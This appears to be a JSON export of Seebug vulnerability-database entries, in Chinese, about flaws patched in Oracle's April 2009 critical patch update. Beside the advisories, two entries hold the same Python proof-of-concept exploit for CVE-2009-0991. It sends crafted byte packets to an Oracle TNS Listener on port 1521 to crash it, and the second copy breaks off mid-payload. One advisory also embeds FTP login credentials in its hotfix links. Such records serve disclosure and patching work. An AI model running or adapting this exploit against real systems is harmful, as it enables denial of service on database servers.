{"seebug": [{"lastseen": "2017-11-19T18:53:43", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 34461\r\nCVE(CAN) ID: CVE-2009-0974,CVE-2009-0983,CVE-2009-0989,CVE-2009-0990,CVE-2009-0993,CVE-2009-0994,CVE-2009-0996,CVE-2009-1008,CVE-2009-1009,CVE-2009-1010,CVE-2009-1011,CVE-2009-1017,CVE-2009-0995,CVE-2009-0999,CVE-2009-1000,CVE-2009-1001,CVE-2009-1002,CVE-2009-1003,CVE-2009-1004,CVE-2009-1005,CVE-2009-1006,CVE-2009-1012,CVE-2009-1016,CVE-2009-0972,CVE-2009-0973,CVE-2009-0975,CVE-2009-0976,CVE-2009-0977,CVE-2009-0978,CVE-2009-0979,CVE-2009-0980,CVE-2009-0981,CVE-2009-0984,CVE-2009-0985,CVE-2009-0986,CVE-2009-0988,CVE-2009-0991,CVE-2009-0992,CVE-2009-0997,CVE-2009-0982,CVE-2009-0998,CVE-2009-1013,CVE-2009-1014,CVE-2009-0189,CVE-2009-0190\r\n\r\nOracle Database\u662f\u4e00\u6b3e\u5546\u4e1a\u6027\u8d28\u5927\u578b\u6570\u636e\u5e93\u7cfb\u7edf\u3002\r\n\r\nOracle\u53d1\u5e03\u4e862009\u5e744\u6708\u7684\u7d27\u6025\u8865\u4e01\u66f4\u65b0\u516c\u544a\uff0c\u4fee\u590d\u4e86\u591a\u4e2aOracle\u4ea7\u54c1\u4e2d\u7684\u591a\u4e2a\u6f0f\u6d1e\u3002\u8fd9\u4e9b\u6f0f\u6d1e\u5f71\u54cdOracle\u4ea7\u54c1\u7684\u6240\u6709\u5b89\u5168\u5c5e\u6027\uff0c\u53ef\u5bfc\u81f4\u672c\u5730\u548c\u8fdc\u7a0b\u7684\u5a01\u80c1\u3002\u5176\u4e2d\u4e00\u4e9b\u6f0f\u6d1e\u53ef\u80fd\u9700\u8981\u5404\u79cd\u7ea7\u522b\u7684\u6388\u6743\uff0c\u4f46\u4e5f\u6709\u4e9b\u4e0d\u9700\u8981\u4efb\u4f55\u6388\u6743\u3002\u6700\u4e25\u91cd\u7684\u6f0f\u6d1e\u53ef\u80fd\u5bfc\u81f4\u5b8c\u5168\u5165\u4fb5\u6570\u636e\u5e93\u7cfb\u7edf\u3002\r\n\r\n1) Oracle\u8fdb\u7a0b\u7ba1\u7406\u5668\u548c\u901a\u77e5\uff08opmn\uff09\u5b88\u62a4\u7a0b\u5e8f\u4e2d\u5b58\u5728\u683c\u5f0f\u4e32\u9519\u8bef\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u54116000/TCP\u7aef\u53e3\u63d0\u4ea4\u7279\u5236\u7684POST\u8bf7\u6c42\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\n2) \u7531\u4e8e\u6ca1\u6709\u6b63\u786e\u5730\u8fc7\u6ee4\u5bf9DBMS_AQIN\u8f6f\u4ef6\u5305\u6240\u4f20\u9001\u7684\u8f93\u5165\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u6076\u610f\u7684\u67e5\u8be2\u8bf7\u6c42\u6267\u884cSQL\u6ce8\u5165\u653b\u51fb\u3002\r\n\r\n3) Oracle\u6570\u636e\u5e93\u6240\u6346\u7ed1\u7684Application Express\u7ec4\u4ef6\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u975e\u7279\u6743\u7528\u6237\u6cc4\u9732LOWS_030000.WWV_FLOW_USER\u4e2d\u7684APEX\u53e3\u4ee4\u54c8\u5e0c\u3002\r\n\r\n4) \u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u5411WebLogic Server\u63d2\u4ef6\u63d0\u4ea4\u6076\u610f\u7684HTTP\u8bf7\u6c42\u89e6\u53d1\u5806\u6ea2\u51fa\u3002\r\n\r\n5) WebLogic Server\u63d2\u4ef6\u5728\u89e3\u6790SSL\u8bc1\u4e66\u65f6\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\u3002\n\nOracle Application Server 10.1.2.3.0\r\nOracle E-Business Suite 12.0.6\r\nOracle E-Business Suite 11.5.10.2\r\nOracle Database 9.2.0.8DV\r\nOracle Database 9.2.0.8\r\nOracle Database 11.1.0.7 \r\nOracle Database 11.1.0.6\r\nOracle Database 10.2.0.4\r\nOracle Database 10.2.0.3\r\nOracle Database 10.1.0.5\r\nOracle PeopleSoft Enterprise PeopleTools 8.49\r\nOracle WebLogic Server 9.2\r\nOracle WebLogic Server 9.1 GA\r\nOracle WebLogic Server 9.0 GA\r\nOracle WebLogic Server 8.1\r\nOracle WebLogic Server 7.0\r\nOracle WebLogic Server 10.3\r\nOracle PeopleSoft Enterprise HRMS 9.0\r\nOracle PeopleSoft Enterprise HRMS 8.9\r\nOracle Outside In SDK HTML Export 8.3.0\r\nOracle Outside In SDK HTML Export 8.2.2\r\nOracle XML Publisher 5.6.2\r\nOracle XML Publisher 10.1.3.2.1\r\nOracle XML Publisher 10.1.3.2\r\nOracle BI Publisher 10.1.3.4\r\nOracle BI Publisher 10.1.3.3.3\r\nOracle BI Publisher 10.1.3.3.2\r\nOracle BI Publisher 10.1.3.3.1\r\nOracle BI Publisher 10.1.3.3.0\r\nOracle WebLogic Portal 8.1\r\nOracle Data Service Integrator 10.3.0\r\nOracle AquaLogic Data Services Platform 3.2\r\nOracle AquaLogic Data Services Platform 3.0.1\r\nOracle AquaLogic Data Services Platform 3.0\r\nOracle JRockit R27.6.2\n Oracle\r\n------\r\nOracle\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08cpuapr2009\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\ncpuapr2009\uff1aOracle Critical Patch Update Advisory - April 2009\r\n\u94fe\u63a5\uff1a<a href=http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html?_template=/o target=_blank rel=external nofollow>http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html?_template=/o</a>", "modified": "2009-04-16T00:00:00", "published": "2009-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-5060", "id": "SSV:5060", "title": "Oracle 2009\u5e744\u6708\u7d27\u6025\u8865\u4e01\u66f4\u65b0\u4fee\u590d\u591a\u4e2a\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T18:50:50", "bulletinFamily": "exploit", "description": "Bugraq ID: 34994\r\nCVE ID\uff1aCVE-2009-1009\r\nCVE-2009-1010\r\nCVE-2009-1011\r\nCNCVE ID\uff1aCNCVE-20091009\r\nCNCVE-20091010\r\nCNCVE-20091011\r\n\r\nOracle Outside In\u662f\u4e00\u6b3e\u8f6f\u4ef6\u5f00\u53d1\u5de5\u5177\u5305\u5957\u4ef6(SDK)\uff0c\u4e3a\u5f00\u53d1\u4eba\u5458\u63d0\u4f9b\u4e86\u4e00\u4e2a\u8bbf\u95ee\u3001\u8f6c\u6362\u548c\u63a7\u5236 400 \u591a\u79cd\u975e\u7ed3\u6784\u5316\u6587\u4ef6\u683c\u5f0f\u7684\u5185\u5bb9\u7684\u7efc\u5408\u89e3\u51b3\u65b9\u6848\u3002\r\nOracle Outside In\u5b58\u5728\u591a\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4ee5\u5e94\u7528\u7a0b\u5e8f\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n-\u5904\u7406Microsoft Excel\u7535\u5b50\u6570\u636e\u8868\u6587\u4ef6\u4e2d\u7684\u7279\u5b9a\u8bb0\u5f55\u7684\u51fd\u6570\u5b58\u5728\u6f0f\u6d1e\uff0c\u6b64\u51fd\u6570\u8bfb\u53d6\u6587\u4ef6\u4e2d\u5305\u542b\u7684\u6574\u6570\u503c\uff0c\u8fd9\u4e2a\u503c\u4e4b\u540e\u7528\u4e8e\u7b97\u672f\u6574\u6570\u8ba1\u7b97\uff0c\u7531\u4e8e\u6ca1\u6709\u9a8c\u8bc1\u68c0\u67e5\uff0c\u53ef\u89e6\u53d1\u6574\u6570\u6ea2\u51fa\u3002\r\n-\u5f53\u5904\u7406Microsoft Excel\u7535\u5b50\u6570\u636e\u8868\u4e2d\u7684\u90e8\u5206\u8bb0\u5f55\u65f6\u7f3a\u5c11\u6b63\u786e\u8fb9\u754c\u68c0\u67e5\uff0c\u6570\u636e\u4ece\u5806\u7f13\u51b2\u533a\u62f7\u8d1d\u5230\u6808\u7f13\u51b2\u533a\u65f6\u7f3a\u5c11\u5145\u5206\u68c0\u67e5\uff0c\u53ef\u5bfc\u81f4\u6808\u7834\u574f\u800c\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n-\u5904\u7406\u7279\u6b8a\u6784\u5efa\u7684Excel\u7535\u5b50\u6570\u636e\u8868\u6587\u4ef6\u65f6\uff0c\u5b58\u50a8\u5728\u5806\u6808\u4e2d\u7684\u7ed3\u6784\u6570\u7ec4\u5728\u7528\u4e8e\u5faa\u73af\u4e58\u64cd\u4f5c\u65f6\u7f3a\u5c11\u5145\u5206\u7684\u8fb9\u754c\u68c0\u67e5\uff0c\u6784\u5efa\u5305\u542b\u5408\u6cd5\u7684\u7578\u5f62\u8bb0\u5f55\u7684\u6587\u4ef6\uff0c\u8bf1\u4f7f\u7528\u6237\u6253\u5f00\u53ef\u89e6\u53d1\u6b64\u6f0f\u6d1e\u3002\r\n-\u5904\u7406\u5b58\u50a8\u5728\u5404\u79cd\u6587\u4ef6\u4e2d\u7684\u53ef\u9009\u6570\u636e\u6d41\u65f6\u5b58\u5728\u591a\u4e2a\u6574\u6570\u6ea2\u51fa\u3002\u8bfb\u53d6\u6587\u4ef6\u4e2d\u7684\u6574\u6570\u503c\u65f6\u5728\u8fdb\u884c\u7b97\u672f\u6574\u6570\u8ba1\u7b97\u65f6\u7f3a\u5c11\u5145\u5206\u9a8c\u8bc1\u3002\n\nOracle Outside In SDK HTML Export 8.3\r\nOracle Outside In SDK HTML Export 8.2.2\r\nOracle Outside In 8.3.0.5129\r\nOracle Outside In 8.2.2.4866\r\nOracle Outside In 8.1.9.4417\r\nOracle Outside In 8.1.5.4282\r\nGood Technologies Good Mobile Messaging Server for Exchange 6.0.0.106\r\nGood Technologies Good Mobile Messaging Server for Exchange 5.0.4.28\r\nGood Technologies Good Mobile Messaging Server for Exchange 4.9.3.41\n \u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u53ef\u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c\uff1a\r\nGood Technologies Good Mobile Messaging Server for Exchange 5.0.4.28\r\nGood Technologies gmm_server_exchange_5_0_4_53_HotFix.exe\r\n<a href=\"ftp://goodcust:g00d4Me!@ftp.good.com/gmm_server_exchange_5_0_4_53_HotF\" target=\"_blank\" rel=external nofollow>ftp://goodcust:g00d4Me!@ftp.good.com/gmm_server_exchange_5_0_4_53_HotF</a> ix.exe\r\nGood Technologies Good Mobile Messaging Server for Exchange 6.0.0.106\r\nGood Technologies gmm_server_exchange_6_0_0_125_hotfix.exe\r\n<a href=\"ftp://goodcust:g00d4Me!@ftp.good.com/gmm_server_exchange_6_0_0_125_hot\" target=\"_blank\" rel=external nofollow>ftp://goodcust:g00d4Me!@ftp.good.com/gmm_server_exchange_6_0_0_125_hot</a> fix.exe", "modified": "2009-05-20T00:00:00", "published": "2009-05-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11362", "id": "SSV:11362", "type": "seebug", "title": "Oracle Outside In\u591a\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:53:01", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-04-21T00:00:00", "published": "2009-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-17919", "id": "SSV:17919", "title": "Oracle RDBMS 10.2.0.3/11.1.0.6 TNS Listener PoC (CVE-2009-0991)", "type": "seebug", "sourceData": "\n \r\n# TNS Listener (Oracle RDBMS) exploit, cause trap in Listener process \r\n# (more precisely: in function memcpy() called from ncrfintn() function which is located in oranro11.dll)\r\n\r\n# Successfully working with Oracle RDBMS Win32 11.1.0.6.0 and Oracle RDBMS Win32 10.2.0.3 with latest CPU patches applied\r\n\r\n# Vulnerability discovered by Dennis Yurichev <dennis@conus.info>\r\n\r\n# Fixed in CPUapr2009, CVE-2009-0991\r\n# http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html\r\n\r\nfrom sys import *\r\nfrom socket import *\r\n\r\nsockobj = socket(AF_INET, SOCK_STREAM)\r\n\r\nsockobj.connect ((argv[1], 1521))\r\n\r\nsockobj.send(\r\n\t"\\x00\\x68\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x3A\\x01\\x2C\\x00\\x00\\x20\\x00"\r\n\t"\\x7F\\xFF\\xC6\\x0E\\x00\\x00\\x01\\x00\\x00\\x2E\\x00\\x3A\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x28\\x43\\x4F\\x4E\\x4E\\x45"\r\n\t"\\x43\\x54\\x5F\\x44\\x41\\x54\\x41\\x3D\\x28\\x43\\x4F\\x4D\\x4D\\x41\\x4E\\x44"\r\n\t"\\x3D\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x5F\\x72\\x65\\x67\\x69\\x73\\x74\\x65"\r\n\t"\\x72\\x5F\\x4E\\x53\\x47\\x52\\x29\\x29")\r\n\r\ndata=sockobj.recv(102400)\r\n\r\nsockobj.send(\r\n\t"\\x02\\xde\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\xd4\\x20\\x08"\r\n\t"\\xff\\x03\\x01\\x00\\x12\\x34\\x34\\x34\\x34\\x34\\x78\\x10\\x10\\x32\\x10\\x32"\r\n\t"\\x10\\x32\\x10\\x32\\x10\\x32\\x54\\x76\\x00\\x78\\x10\\x32\\x54\\x76\\x44\\x00"\r\n\t"\\x00\\x80\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x70\\xe4\\xa5\\x09\\x90\\x00"\r\n\t"\\x23\\x00\\x00\\x00\\x42\\x45\\x43\\x37\\x36\\x43\\x32\\x43\\x43\\x31\\x33\\x36"\r\n\t"\\x2d\\x35\\x46\\x39\\x46\\x2d\\x45\\x30\\x33\\x34\\x2d\\x30\\x30\\x30\\x33\\x42"\r\n\t"\\x41\\x31\\x33\\x37\\x34\\x42\\x33\\x03\\x00\\x65\\x00\\x01\\x00\\x01\\x00\\x00"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x64\\x02\\x00\\x80\\x05\\x00\\x00\\x00\\x00\\x04"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x02\\x00"\r\n\t"\\x00\\x00\\x84\\xc3\\xcc\\x07\\x01\\x00\\x00\\x00\\x84\\x2f\\xa6\\x09\\x00\\x00"\r\n\t"\\x00\\x00\\x44\\xa5\\xa2\\x09\\x25\\x98\\x18\\xe9\\x28\\x50\\x4f\\x28\\xbb\\xac"\r\n\t"\\x15\\x56\\x8e\\x68\\x1d\\x6d\\x05\\x00\\x00\\x00\\xfc\\xa9\\x36\\x22\\x0f\\x00"\r\n\t"\\x00\\x00\\x60\\x30\\xa6\\x09\\x0a\\x00\\x00\\x00\\x64\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x00\\xaa\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x17\\x00\\x00\\x00\\x78\\xc3"\r\n\t"\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x28\\x48\\x4f\\x53\\x54\\x3d\\x77\\x69\\x6e"\r\n\t"\\x32\\x30\\x30\\x33\\x29\\x00\\x01\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x01\\x00"\r\n\t"\\x00\\x00\\x50\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x34\\xc5\\x2f\\x22\\x00\\x00"\r\n\t"\\x00\\x00\\x9c\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00\\x09"\r\n\t"\\x00\\x00\\x00\\x50\\xc5\\x2f\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f"\r\n\t"\\x58\\x50\\x54\\x00\\x01\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00"\r\n\t"\\x84\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x68\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00"\r\n\t"\\xa4\\xa5\\xa2\\x09\\x6f\\x72\\x63\\x6c\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f"\r\n\t"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x01\\x00\\x00\\x00\\x10\\x00"\r\n\t"\\x00\\x00\\x02\\x00\\x00\\x00\\xbc\\xc3\\xcc\\x07\\x00\\x00\\x00\\x00\\xb0\\x2f"\r\n\t"\\xa6\\x09\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x89\\xc0\\xb1\\xc3\\x08\\x1d"\r\n\t"\\x46\\x6d\\xb6\\xcf\\xd1\\xdd\\x2c\\xa7\\x66\\x6d\\x0a\\x00\\x00\\x00\\x78\\x2b"\r\n\t"\\xbc\\x04\\x7f\\x00\\x00\\x00\\x64\\xa7\\xa2\\x09\\x0d\\x00\\x00\\x00\\x20\\x2c"\r\n\t"\\xbc\\x04\\x11\\x00\\x00\\x00\\x95\\x00\\x00\\x00\\x02\\x20\\x00\\x80\\x03\\x00"\r\n\t"\\x00\\x00\\x98\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\\x00"\r\n\t"\\x00\\x00\\xb0\\xc3\\xcc\\x07\\x44\\x45\\x44\\x49\\x43\\x41\\x54\\x45\\x44\\x00"\r\n\t"\\x28\\x41\\x44\\x44\\x52\\x45\\x53\\x53\\x3d\\x28\\x50\\x52\\x4f\\x54\\x4f\\x43"\r\n\t"\\x4f\\x4c\\x3d\\x42\\x45\\x51\\x29\\x28\\x50\\x52\\x4f\\x47\\x52\\x41\\x4d\\x3d"\r\n\t"\\x43\\x3a\\x5c\\x61\\x70\\x70\\x5c\\x41\\x64\\x6d\\x69\\x6e\\x69\\x73\\x74\\x72"\r\n\t"\\x61\\x74\\x6f\\x72\\x5c\\x70\\x72\\x6f\\x64\\x75\\x63\\x74\\x5c\\x31\\x31\\x2e"\r\n\t"\\x31\\x2e\\x30\\x5c\\x64\\x62\\x5f\\x31\\x5c\\x62\\x69\\x6e\\x5c\\x6f\\x72\\x61"\r\n\t"\\x63\\x6c\\x65\\x2e\\x65\\x78\\x65\\x29\\x28\\x41\\x52\\x47\\x56\\x30\\x3d\\x6f"\r\n\t"\\x72\\x61\\x63\\x6c\\x65\\x6f\\x72\\x63\\x6c\\x29\\x28\\x41\\x52\\x47\\x53\\x3d"\r\n\t"\\x27\\x28\\x4c\\x4f\\x43\\x41\\x4c\\x3d\\x4e\\x4f\\x29\\x27\\x29\\x29\\x00\\x4c"\r\n\t"\\x4f\\x43\\x41\\x4c\\x20\\x53\\x45\\x52\\x56\\x45\\x52\\x00\\x68\\xc5\\x2f\\x22"\r\n\t"\\x34\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f\\x22"\r\n\t"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x09\\x00\\x00\\x00\\x50\\xc5\\x2f"\r\n\t"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00"\r\n)\r\n\r\nsockobj.close()\r\n\r\n# milw0rm.com [2009-04-21]\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-17919"}, {"lastseen": "2017-11-19T16:01:34", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66468", "id": "SSV:66468", "title": "Oracle RDBMS 10.2.0.3/11.1.0.6 - TNS Listener PoC", "type": "seebug", "sourceData": "\n # TNS Listener (Oracle RDBMS) exploit, cause trap in Listener process \r\n# (more precisely: in function memcpy() called from ncrfintn() function which is located in oranro11.dll)\r\n\r\n# Successfully working with Oracle RDBMS Win32 11.1.0.6.0 and Oracle RDBMS Win32 10.2.0.3 with latest CPU patches applied\r\n\r\n# Vulnerability discovered by Dennis Yurichev <dennis@conus.info>\r\n\r\n# Fixed in CPUapr2009, CVE-2009-0991\r\n# http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html\r\n\r\nfrom sys import *\r\nfrom socket import *\r\n\r\nsockobj = socket(AF_INET, SOCK_STREAM)\r\n\r\nsockobj.connect ((argv[1], 1521))\r\n\r\nsockobj.send(\r\n\t"\\x00\\x68\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x3A\\x01\\x2C\\x00\\x00\\x20\\x00"\r\n\t"\\x7F\\xFF\\xC6\\x0E\\x00\\x00\\x01\\x00\\x00\\x2E\\x00\\x3A\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x28\\x43\\x4F\\x4E\\x4E\\x45"\r\n\t"\\x43\\x54\\x5F\\x44\\x41\\x54\\x41\\x3D\\x28\\x43\\x4F\\x4D\\x4D\\x41\\x4E\\x44"\r\n\t"\\x3D\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x5F\\x72\\x65\\x67\\x69\\x73\\x74\\x65"\r\n\t"\\x72\\x5F\\x4E\\x53\\x47\\x52\\x29\\x29")\r\n\r\ndata=sockobj.recv(102400)\r\n\r\nsockobj.send(\r\n\t"\\x02\\xde\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\xd4\\x20\\x08"\r\n\t"\\xff\\x03\\x01\\x00\\x12\\x34\\x34\\x34\\x34\\x34\\x78\\x10\\x10\\x32\\x10\\x32"\r\n\t"\\x10\\x32\\x10\\x32\\x10\\x32\\x54\\x76\\x00\\x78\\x10\\x32\\x54\\x76\\x44\\x00"\r\n\t"\\x00\\x80\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x70\\xe4\\xa5\\x09\\x90\\x00"\r\n\t"\\x23\\x00\\x00\\x00\\x42\\x45\\x43\\x37\\x36\\x43\\x32\\x43\\x43\\x31\\x33\\x36"\r\n\t"\\x2d\\x35\\x46\\x39\\x46\\x2d\\x45\\x30\\x33\\x34\\x2d\\x30\\x30\\x30\\x33\\x42"\r\n\t"\\x41\\x31\\x33\\x37\\x34\\x42\\x33\\x03\\x00\\x65\\x00\\x01\\x00\\x01\\x00\\x00"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x64\\x02\\x00\\x80\\x05\\x00\\x00\\x00\\x00\\x04"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x02\\x00"\r\n\t"\\x00\\x00\\x84\\xc3\\xcc\\x07\\x01\\x00\\x00\\x00\\x84\\x2f\\xa6\\x09\\x00\\x00"\r\n\t"\\x00\\x00\\x44\\xa5\\xa2\\x09\\x25\\x98\\x18\\xe9\\x28\\x50\\x4f\\x28\\xbb\\xac"\r\n\t"\\x15\\x56\\x8e\\x68\\x1d\\x6d\\x05\\x00\\x00\\x00\\xfc\\xa9\\x36\\x22\\x0f\\x00"\r\n\t"\\x00\\x00\\x60\\x30\\xa6\\x09\\x0a\\x00\\x00\\x00\\x64\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x00\\xaa\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x17\\x00\\x00\\x00\\x78\\xc3"\r\n\t"\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x28\\x48\\x4f\\x53\\x54\\x3d\\x77\\x69\\x6e"\r\n\t"\\x32\\x30\\x30\\x33\\x29\\x00\\x01\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x01\\x00"\r\n\t"\\x00\\x00\\x50\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x34\\xc5\\x2f\\x22\\x00\\x00"\r\n\t"\\x00\\x00\\x9c\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00\\x09"\r\n\t"\\x00\\x00\\x00\\x50\\xc5\\x2f\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f"\r\n\t"\\x58\\x50\\x54\\x00\\x01\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00"\r\n\t"\\x84\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x68\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00"\r\n\t"\\xa4\\xa5\\xa2\\x09\\x6f\\x72\\x63\\x6c\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f"\r\n\t"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x01\\x00\\x00\\x00\\x10\\x00"\r\n\t"\\x00\\x00\\x02\\x00\\x00\\x00\\xbc\\xc3\\xcc\\x07\\x00\\x00\\x00\\x00\\xb0\\x2f"\r\n\t"\\xa6\\x09\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x89\\xc0\\xb1\\xc3\\x08\\x1d"\r\n\t"\\x46\\x6d\\xb6\\xcf\\xd1\\xdd\\x2c\\xa7\\x66\\x6d\\x0a\\x00\\x00\\x00\\x78\\x2b"\r\n\t"\\xbc\\x04\\x7f\\x00\\x00\\x00\\x64\\xa7\\xa2\\x09\\x0d\\x00\\x00\\x00\\x20\\x2c"\r\n\t"\\xbc\\x04\\x11\\x00\\x00\\x00\\x95\\x00\\x00\\x00\\x02\\x20\\x00\\x80\\x03\\x00"\r\n\t"\\x00\\x00\\x98\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\\x00"\r\n\t"\\x00\\x00\\xb0\\xc3\\xcc\\x07\\x44\\x45\\x44\\x49\\x43\\x41\\x54\\x45\\x44\\x00"\r\n\t"\\x28\\x41\\x44\\x44\\x52\\x45\\x53\\x53\\x3d\\x28\\x50\\x52\\x4f\\x54\\x4f\\x43"\r\n\t"\\x4f\\x4c\\x3d\\x42\\x45\\x51\\x29\\x28\\x50\\x52\\x4f\\x47\\x52\\x41\\x4d\\x3d"\r\n\t"\\x43\\x3a\\x5c\\x61\\x70\\x70\\x5c\\x41\\x64\\x6d\\x69\\x6e\\x69\\x73\\x74\\x72"\r\n\t"\\x61\\x74\\x6f\\x72\\x5c\\x70\\x72\\x6f\\x64\\x75\\x63\\x74\\x5c\\x31\\x31\\x2e"\r\n\t"\\x31\\x2e\\x30\\x5c\\x64\\x62\\x5f\\x31\\x5c\\x62\\x69\\x6e\\x5c\\x6f\\x72\\x61"\r\n\t"\\x63\\x6c\\x65\\x2e\\x65\\x78\\x65\\x29\\x28\\x41\\x52\\x47\\x56\\x30\\x3d\\x6f"\r\n\t"\\x72\\x61\\x63\\x6c\\x65\\x6f\\x72\\x63\\x6c\\x29\\x28\\x41\\x52\\x47\\x53\\x3d"\r\n\t"\\x27\\x28\\x4c\\x4f\\x43\\x41\\x4c\\x3d\\x4e\\x4f\\x29\\x27\\x29\\x29\\x00\\x4c"\r\n\t"\\x4f\\x43\\x41\\x4c\\x20\\x53\\x45\\x52\\x56\\x45\\x52\\x00\\x